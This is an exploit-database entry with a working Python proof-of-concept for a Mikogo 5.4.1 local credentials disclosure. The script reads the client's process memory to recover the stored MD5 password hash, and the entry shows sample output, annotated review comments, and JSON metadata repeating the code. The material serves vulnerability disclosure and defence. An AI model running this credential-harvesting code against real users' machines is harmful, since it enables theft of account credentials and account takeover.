ID PACKETSTORM:144715 Type packetstorm Reporter Gjoko Krstic Modified 2017-10-24T00:00:00
Description
`#!/usr/bin/env python
#
#
# Mikogo 5.4.1.160608 Local Credentials Disclosure
#
#
# Vendor: Snapview GmbH
# Product web page: https://www.mikogo.com
# Affected version: 5.4.1.160608
#
# Summary: Mikogo is a desktop sharing software application for
# web conferencing and remote support, and is provided by the online
# collaboration provider, BeamYourScreen GmbH. Mikogo provides
# its software as native downloads for Windows, Mac OS X, Linux,
# iOS and Android.
#
# Desc: Mikogo is vulnerable to local credentials disclosure: the
# supplied password is stored as an MD5 hash in process memory.
# A potential attacker could reveal the supplied password hash and
# re-use it or store it via the configuration file in order to gain
# access to the account.
#
# ------------------------------------------------------------------
#
# 0:017> s -a 0 L?80000000 "password="
# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang
# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma
# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811
# 0:017> da 06a422b3
# 06a422b3 "password=482C811DA5D5B4BC6D497FF"
# 06a422d3 "A98491E38...."
#
# ...
# ...
#
# C:\Users\Charlie\Desktop>python mikogo_mem.py
# [~] Searching for pid by process name 'Mikogo-host.exe'..
# [+] Found process with pid #1116
# [~] Trying to read memory for pid #1116
# [+] Credentials found!
# ----------------------------------------
# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38
#
# ------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5439
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php
#
#
# 03.07.2017
#
#
# Based on Yakir Wizman's PoC:
#
import time
import urllib
from winappdbg import Debug, Process
# Proof of concept from the advisory header above: locate the running Mikogo
# host process and look in its memory for the "password=" marker that the
# client keeps resident, followed by the value the advisory identifies as an
# MD5 digest of the supplied password.
# For defenders the point is the credential left resident in RAM: any
# principal allowed to read this process's memory (same user, or an
# administrator) can recover the digest, so the client should not keep the
# credential after authenticating and should clear the buffer it used.
# Cross-process memory reads of the client from an unexpected image are the
# observable a detection would key on.
# NOTE(review): `urllib` and `username` are imported/assigned but never used.
username = ''
password = ''
# Flipped to 1 once a non-empty value has been printed.
found = 0
# Image name of the process to search for.
filename = "Mikogo-host.exe"
process_pid = 0
# Raw 42-byte reads, one per marker hit.
memory_dump = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
# find_processes_by_filename yields (process, name) pairs for every match.
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
# NOTE(review): `is not 0` is an identity test on an int; it happens to
# work for small ints in CPython, but `!= 0` is the comparison intended.
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
# The byte pattern is "\npassword=" (0x0a followed by the ASCII marker).
for address in process.search_bytes('\x0a\x70\x61\x73\x73\x77\x6f\x72\x64\x3d'):
# 42 = 10-byte marker + the 32-character hex value shown in the header.
memory_dump.append(process.read(address,42))
for i in range(len(memory_dump)):
# Keep what follows the marker.  Indexing [1] relies on the marker being
# inside the read, which holds because each read starts at a match address.
password = memory_dump[i].split('password=')[1]
if password !='':
found = 1
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] MD5 Password: %s" % password
# NOTE(review): `found` is never reset, so with several matching processes
# a hit in an earlier one suppresses this message for a later one.
if found == 0:
print "[-] Credentials not found! Make sure the client is connected."
else:
print "[-] No process found with name '%s'." % (filename)
# NOTE(review): presumably the winappdbg event loop; nothing is attached
# above, so it is expected to return promptly -- confirm against winappdbg.
debug.loop()
finally:
# Always release the debugger, whether or not a process was found.
debug.stop()
`
{"id": "PACKETSTORM:144715", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Mikogo 5.4.1.160608 Local Credentials Disclosure", "description": "", "published": "2017-10-24T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/144715/Mikogo-5.4.1.160608-Local-Credentials-Disclosure.html", "reporter": "Gjoko Krstic", "references": [], "cvelist": [], "lastseen": "2017-10-24T13:59:55", "viewCount": 21, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2017-10-24T13:59:55", "rev": 2}, "dependencies": {"references": [], "modified": "2017-10-24T13:59:55", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/144715/ZSL-2017-5439.txt", "sourceData": "`#!/usr/bin/env python \n# \n# \n# Mikogo 5.4.1.160608 Local Credentials Disclosure \n# \n# \n# Vendor: Snapview GmbH \n# Product web page: https://www.mikogo.com \n# Affected version: 5.4.1.160608 \n# \n# Summary: Mikogo is a desktop sharing software application for \n# web conferencing and remote support, and is provided by the online \n# collaboration provider, BeamYourScreen GmbH. Mikogo provides \n# its software as native downloads for Windows, Mac OS X, Linux, \n# iOS and Android. \n# \n# Desc: Mikogo is vulnerable to local credentials disclosure, the \n# supplied password is stored as a MD5 hash format in memory process. \n# A potential attacker could reveal the supplied password hash and \n# re-use it or store it via the configuration file in order to gain \n# access to the account. 
\n# \n# ------------------------------------------------------------------ \n# \n# 0:017> s -a 0 L?80000000 \"password=\" \n# 0125cdad 70 61 73 73 77 6f 72 64-3d 00 00 26 6c 61 6e 67 password=..&lang \n# 0146e6b8 70 61 73 73 77 6f 72 64-3d 00 00 00 64 6f 6d 61 password=...doma \n# 06a422b3 70 61 73 73 77 6f 72 64-3d 34 42 33 42 38 37 34 password=482C811 \n# 0:017> da 06a422b3 \n# 06a422b3 \"password=482C811DA5D5B4BC6D497FF\" \n# 06a422d3 \"A98491E38....\" \n# \n# ... \n# ... \n# \n# C:\\Users\\Charlie\\Desktop>python mikogo_mem.py \n# [~] Searching for pid by process name 'Mikogo-host.exe'.. \n# [+] Found process with pid #1116 \n# [~] Trying to read memory for pid #1116 \n# [+] Credentials found! \n# ---------------------------------------- \n# [+] MD5 Password: 482C811DA5D5B4BC6D497FFA98491E38 \n# \n# ------------------------------------------------------------------ \n# \n# Tested on: Microsoft Windows 7 Professional SP1 (EN) \n# \n# \n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \n# @zeroscience \n# \n# \n# Advisory ID: ZSL-2017-5439 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5439.php \n# \n# \n# 03.07.2017 \n# \n# \n# Based on Yakir Wizman's PoC: \n# \n \n \nimport time \nimport urllib \nfrom winappdbg import Debug, Process \n \nusername = '' \npassword = '' \nfound = 0 \nfilename = \"Mikogo-host.exe\" \nprocess_pid = 0 \nmemory_dump = [] \n \ndebug = Debug() \ntry: \nprint \"[~] Searching for pid by process name '%s'..\" % (filename) \ntime.sleep(1) \ndebug.system.scan_processes() \nfor (process, process_name) in debug.system.find_processes_by_filename(filename): \nprocess_pid = process.get_pid() \nif process_pid is not 0: \nprint \"[+] Found process with pid #%d\" % (process_pid) \ntime.sleep(1) \nprint \"[~] Trying to read memory for pid #%d\" % (process_pid) \n \nprocess = Process(process_pid) \nfor address in process.search_bytes('\\x0a\\x70\\x61\\x73\\x73\\x77\\x6f\\x72\\x64\\x3d'): 
\nmemory_dump.append(process.read(address,42)) \nfor i in range(len(memory_dump)): \npassword = memory_dump[i].split('password=')[1] \nif password !='': \nfound = 1 \nprint \"[+] Credentials found!\\r\\n----------------------------------------\" \nprint \"[+] MD5 Password: %s\" % password \nif found == 0: \nprint \"[-] Credentials not found! Make sure the client is connected.\" \nelse: \nprint \"[-] No process found with name '%s'.\" % (filename) \n \ndebug.loop() \nfinally: \ndebug.stop() \n`\n", "immutableFields": []}